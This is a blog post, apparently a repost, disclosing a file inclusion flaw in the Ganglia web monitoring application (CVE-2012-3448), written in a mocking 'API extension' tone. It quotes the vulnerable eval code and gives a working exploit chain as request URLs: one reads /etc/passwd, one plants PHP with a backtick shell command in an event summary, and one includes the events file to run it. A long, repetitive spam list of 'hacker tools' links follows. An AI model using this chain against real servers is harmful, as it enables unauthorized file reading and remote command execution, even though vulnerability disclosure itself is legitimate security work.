http://console-cowboys.blogspot.com/2012/01/ganglia-monitoring-system-lfi.html
I recently grabbed the latest version of the Ganglia web application to take a look to see if this issue has been fixed and I was pleasantly surprised... github is over here -
https://github.com/ganglia/ganglia-web
Looking at the code the following (abbreviated "graph.php") sequence can be found -
$graph = isset($_GET["g"]) ? sanitize ( $_GET["g"] ) : "metric";
....
$graph_arguments = NULL;
$pos = strpos($graph, ",");
$graph_arguments = substr($graph, $pos + 1);
....
eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');
I can only guess that this previous snippet of code was meant to be used as some sort of API put in place for remote developers, unfortunately it is slightly broken. For some reason when this API was being developed part of its interface was wrapped in the following function -
function sanitize ( $string ) {
return escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}
According the the PHP documentation -
Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.
This limitation of the API means we cannot simply pass in a function like eval, exec, system, or use backticks to create our Ganglia extension. Our only option is to use PHP functions that do not require "(" or ")" a quick look at the available options (http://www.php.net/manual/en/reserved.keywords.php) it looks like "include" would work nicely. An example API request that would help with administrative reporting follows:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/etc/passwd'
Very helpful, we can get a nice report with a list of current system users. Reporting like this is a nice feature but what we really would like to do is create a new extension that allows us to execute system commands on the Ganglia system. After a brief examination of the application it was found that we can leverage some other functionality of the application to finalize our Ganglia extension. The "events" page allows for a Ganglia user to configure events in the system, I am not exactly sure what type of events you would configure, but I hope that I am invited.
As you can see in the screen shot I have marked the "Event Summary" with "php here". When creating our API extension event we will fill in this event with the command we wish to run, see the following example request -
http://192.168.18.157/gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00%20&end_time=07/02/2012%2000:00%20&host_regex=
This request will set up an "event" that will let everyone know who you are, that would be the friendly thing to do when attending an event. We can now go ahead and wire up our API call to attend our newly created event. Since we know that Ganglia keeps track of all planned events in the following location "/var/lib/ganglia/conf/events.json" lets go ahead and include this file in our API call -
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json'
As you can see we have successfully made our API call and let everyone know at the "event" that our name is "www-data". From here I will leave the rest of the API development up to you. I hope this article will get you started on your Ganglia API development and you are able to implement whatever functionality your environment requires. Thanks for following along.
Update: This issue has been assigned CVE-2012-3448
Related articles
- Pentest Tools Port Scanner
- Hack And Tools
- Hacker Tools Linux
- Hack Apps
- Hacker Tools 2019
- Hacker Tools Apk
- Pentest Tools Subdomain
- Hack Website Online Tool
- Pentest Tools Online
- Pentest Tools Bluekeep
- Hak5 Tools
- Free Pentest Tools For Windows
- Hack Tools Online
- Usb Pentest Tools
- Hack Tools
- Beginner Hacker Tools
- Github Hacking Tools
- Hack Tools For Mac
- Pentest Tools
- Hacking Tools For Beginners
- Hacker Tool Kit
- Hack App
- Pentest Tools Port Scanner
- Hacker Tools Hardware
- Hack Tool Apk
- Pentest Tools Alternative
- Nsa Hack Tools Download
- Pentest Tools
- Hacking Tools 2020
- Easy Hack Tools
- Beginner Hacker Tools
- Hack Tools For Ubuntu
- Hack Tools Pc
- Termux Hacking Tools 2019
- Nsa Hacker Tools
- Free Pentest Tools For Windows
- Hacking Tools Software
- Pentest Tools For Ubuntu
- Wifi Hacker Tools For Windows
- Hack Tools
- How To Install Pentest Tools In Ubuntu
- Pentest Tools List
- What Is Hacking Tools
- Hacker Tools Github
- Pentest Tools Online
- Hack Tools For Pc
- Hacker Tools Github
- Underground Hacker Sites
- Blackhat Hacker Tools
- Underground Hacker Sites
- Hacks And Tools
- Easy Hack Tools
- Hacker Tools For Pc
- Hacking App
- Pentest Tools Free
- Hacker Tools For Windows
- Pentest Tools Online
- Hacking Tools Software
- Best Hacking Tools 2019
- Hack App
- Hacking Tools Software
- Hacking Tools For Windows Free Download
- Pentest Tools For Ubuntu
- Growth Hacker Tools
- Hacking Tools Usb
- Pentest Tools For Android
- Pentest Tools Review
- Pentest Recon Tools
- Hacker Tools Software
- Hacker Tools Linux
- Best Pentesting Tools 2018
- Hacking Tools 2019
- Pentest Tools Open Source
- Pentest Reporting Tools
- Hacker Tools Online
- Top Pentest Tools
- Hacking Tools
- Hacking Tools For Kali Linux
- Underground Hacker Sites
- Hacker Security Tools
- Pentest Tools
- Hacker Tools Linux
- Hacker Tools Apk Download
- Hack Apps
- Hacker Tools Online
- Black Hat Hacker Tools
- Free Pentest Tools For Windows
- Hacker Security Tools
- Pentest Tools List
- Free Pentest Tools For Windows
- Hak5 Tools
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.